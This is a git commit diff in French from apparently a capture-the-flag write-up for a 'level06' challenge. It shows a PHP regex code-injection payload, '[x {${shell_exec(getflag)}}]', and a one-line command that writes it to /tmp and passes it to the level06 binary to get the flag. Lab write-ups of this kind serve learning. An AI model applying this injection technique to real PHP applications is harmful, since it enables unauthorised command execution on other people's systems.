legere amelioration
simplification de l'utilisation de l'exploit
This commit is contained in:
parent
07f4325c5a
commit
778ecf386d
|
@ -13,8 +13,9 @@ on remarque qu'on peut utiliser une commande shell en php avec shell_exec, il su
|
|||
shell_exec(getflag)
|
||||
dans la regex
|
||||
|
||||
il faut un ficher avec
|
||||
il faut un ficher avec: [x {${shell_exec(getflag)}}]
|
||||
puis rentrer ce fichier en argument du binaire level06
|
||||
|
||||
$ echo '[x {${shell_exec(getflag)}}]' > /tmp/exploit06 && ./level06 /tmp/exploit06
|
||||
|
||||
[x {${shell_exec(getflag)}}]
|
||||
|
||||
puis rentrer ce fichier en argument du binaire level06
|
Loading…
Reference in New Issue